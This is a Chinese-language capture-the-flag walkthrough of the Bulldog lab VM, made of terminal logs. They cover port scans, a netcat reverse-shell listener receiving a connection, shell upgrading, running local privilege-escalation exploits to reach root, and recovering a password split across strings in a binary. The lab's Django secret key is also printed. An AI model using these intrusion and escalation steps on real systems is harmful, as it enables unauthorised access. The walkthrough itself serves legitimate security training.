┌──(kali㉿kali)-[~] └─$ sudo nmap --min-rate 10000 -p- 192.168.56.123 Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-02 23:49 EDT Nmap scan report for 192.168.56.123 Host is up (0.00028s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 23/tcp open telnet 80/tcp open http 8080/tcp open http-proxy MAC Address: 08:00:27:07:AE:20 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 8.70 seconds
┌──(kali㉿kali)-[~] └─$ sudo nmap -sT -sV -sC -O -p23,80,8080 192.168.56.123 Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-02 23:49 EDT Nmap scan report for 192.168.56.123 Host is up (0.00035s latency).
PORT STATE SERVICE VERSION 23/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 20:8b:fc:9e:d9:2e:28:22:6b:2e:0e:e3:72:c5:bb:52 (RSA) | 256 cd:bd:45:d8:5c:e4:8c:b6:91:e5:39:a9:66:cb:d7:98 (ECDSA) |_ 256 2f:ba:d5:e5:9f:a2:43:e5:3b:24:2c:10:c2:0a:da:66 (ED25519) 80/tcp open http WSGIServer 0.1 (Python 2.7.12) |_http-title: Bulldog Industries 8080/tcp open http WSGIServer 0.1 (Python 2.7.12) |_http-title: Bulldog Industries MAC Address: 08:00:27:07:AE:20 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 21.33 seconds
┌──(kali㉿kali)-[~/Downloads/bulldog] └─$ sudo nmap --script=vuln -p23,80,8080 192.168.56.123 [sudo] password for kali: Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-03 01:41 EDT Nmap scan report for 192.168.56.123 Host is up (0.00035s latency).
PORT STATE SERVICE 23/tcp open telnet 80/tcp open http |_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities. |_http-dombased-xss: Couldn\'t find any DOM based XSS. |_http-csrf: Couldn\'t find any CSRF vulnerabilities. | http-fileupload-exploiter: | | Couldn\'t find a file-type field. | |_ Couldn\'t find a file-type field. | http-enum: | /robots.txt: Robots file |_ /dev/: Potentially interesting folder 8080/tcp open http-proxy | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server\'s resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_ http://ha.ckers.org/slowloris/ | http-enum: | /robots.txt: Robots file |_ /dev/: Potentially interesting folder MAC Address: 08:00:27:07:AE:20 (Oracle VirtualBox virtual NIC)
┌──(kali㉿kali)-[~] └─$ sudo nc -lvnp 443 [sudo] password for kali: listening on [any] 443 ... connect to [192.168.56.106] from (UNKNOWN) [192.168.56.123] 48748 bash: cannot set terminal process group (976): Inappropriate ioctl for device bash: no job control in this shell To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root"for details.
bash: /root/.bashrc: Permission denied django@bulldog:/home/django/bulldog$whoami whoami django django@bulldog:/home/django/bulldog$ id id uid=1001(django) gid=1001(django) groups=1001(django),27(sudo) django@bulldog:/home/django/bulldog$ ip a ip a 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 link/ether 08:00:27:07:ae:20 brd ff:ff:ff:ff:ff:ff inet 192.168.56.123/24 brd 192.168.56.255 scope global enp0s3 valid_lft forever preferred_lft forever inet6 fe80::a00:27ff:fe07:ae20/64 scope link valid_lft forever preferred_lft forever django@bulldog:/home/django/bulldog$ uname -a uname -a Linux bulldog 4.4.0-87-generic #110-Ubuntu SMP Tue Jul 18 12:55:35 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
确定目标反弹成功,并且知道了内核版本号,接下来完善一下 shell
1 2 3 4 5 6 7 8
django@bulldog:/home/django/bulldog$ python -c "import pty;pty.spawn('/bin/bash')" </bulldog$ python -c "import pty;pty.spawn('/bin/bash')" To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root"for details.
# Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '%9a3ph3iwk$v*_#x4ejg8(t5(qll0fl8q8&u+o_g$yi83d*riq'
定时任务和SUID
看看定时任务
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
django@bulldog:/$ cat /etc/crontab cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do.
[-] FAILED: your need make / build tools ./41240.sh: line 61: /tmp/r00t: No such file or directory ./41240.sh: line 62: /tmp/r00t: No such file or directory
django@bulldog:/home$ cd bulldogadmin cd bulldogadmin django@bulldog:/home/bulldogadmin$ ls -liah ls -liah total 40K 687 drwxr-xr-x 5 bulldogadmin bulldogadmin 4.0K Sep 21 2017 . 12 drwxr-xr-x 4 root root 4.0K Aug 24 2017 .. 16091 -rw-r--r-- 1 bulldogadmin bulldogadmin 220 Aug 24 2017 .bash_logout 16190 -rw-r--r-- 1 bulldogadmin bulldogadmin 3.7K Aug 24 2017 .bashrc 16850 drwx------ 2 bulldogadmin bulldogadmin 4.0K Aug 24 2017 .cache 141810 drwxrwxr-x 2 bulldogadmin bulldogadmin 4.0K Sep 21 2017 .hiddenadmindirectory 16892 drwxrwxr-x 2 bulldogadmin bulldogadmin 4.0K Aug 25 2017 .nano 16235 -rw-r--r-- 1 bulldogadmin bulldogadmin 655 Aug 24 2017 .profile 16888 -rw-rw-r-- 1 bulldogadmin bulldogadmin 66 Aug 25 2017 .selected_editor 16854 -rw-r--r-- 1 bulldogadmin bulldogadmin 0 Aug 24 2017 .sudo_as_admin_successful 16232 -rw-rw-r-- 1 bulldogadmin bulldogadmin 217 Aug 24 2017 .wget-hsts django@bulldog:/home/bulldogadmin$ cd .hiddenadmindirectory cd .hiddenadmindirectory django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ ls -liah ls -liah total 24K 141810 drwxrwxr-x 2 bulldogadmin bulldogadmin 4.0K Sep 21 2017 . 687 drwxr-xr-x 5 bulldogadmin bulldogadmin 4.0K Sep 21 2017 .. 141862 -rw-r--r-- 1 bulldogadmin bulldogadmin 8.6K Aug 26 2017 customPermissionApp 141866 -rw-rw-r-- 1 bulldogadmin bulldogadmin 619 Sep 21 2017 note django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ cat note cat note Nick,
I'm working on the backend permission stuff. Listen, it's super prototype but I think it's going to work out great. Literally run the app, give your account password, and it will determine if you should have access to that file or not!
It's great stuff! Once I'm finished with it, a hacker wouldn't even be able to reverse it! Keep in mind that it's still a prototype right now. I am about to get it working with the Django user account. I'm not sure how I'll implement it for the others. Maybe the webserver is the only one who needs to have root access sometimes?
django@bulldog:/tmp$ chmod +x exploit chmod +x exploit django@bulldog:/tmp$ ./exploit ./exploit 2023/07/03 04:30:56 CMDTOEXECUTE is empty fallback to default value 2023/07/03 04:30:56 Executing command sh # whoami whoami root # cd /root cd /root # ls ls congrats.txt # cat congrats.txt cat congrats.txt Congratulations on completing this VM :D That wasn't so bad was it?
Let me know what you thought on twitter, I'm @frichette_n
As far as I know there are two ways to get root. Can you find the other one?
Perhaps the sequel will be more challenging. Until next time, I hope you enjoyed! # ip a ip a 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 link/ether 08:00:27:07:ae:20 brd ff:ff:ff:ff:ff:ff inet 192.168.56.123/24 brd 192.168.56.255 scope global enp0s3 valid_lft forever preferred_lft forever inet6 fe80::a00:27ff:fe07:ae20/64 scope link valid_lft forever preferred_lft forever # uname -a uname -a Linux bulldog 4.4.0-87-generic #110-Ubuntu SMP Tue Jul 18 12:55:35 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux # whoami whoami root
拆分组合隐藏的密码
其实是自己对英文的敏感度不够,没有看出这里其实是把有意义的单词进行拆分组合。
1 2 3 4
SUPERultH imatePASH SWORDyouH CANTget
把 H 去掉,其他的连起来就是 SUPERultimatePASSWORDyouCANTget,翻译成中文就是超级中级密码,你不可能拿到。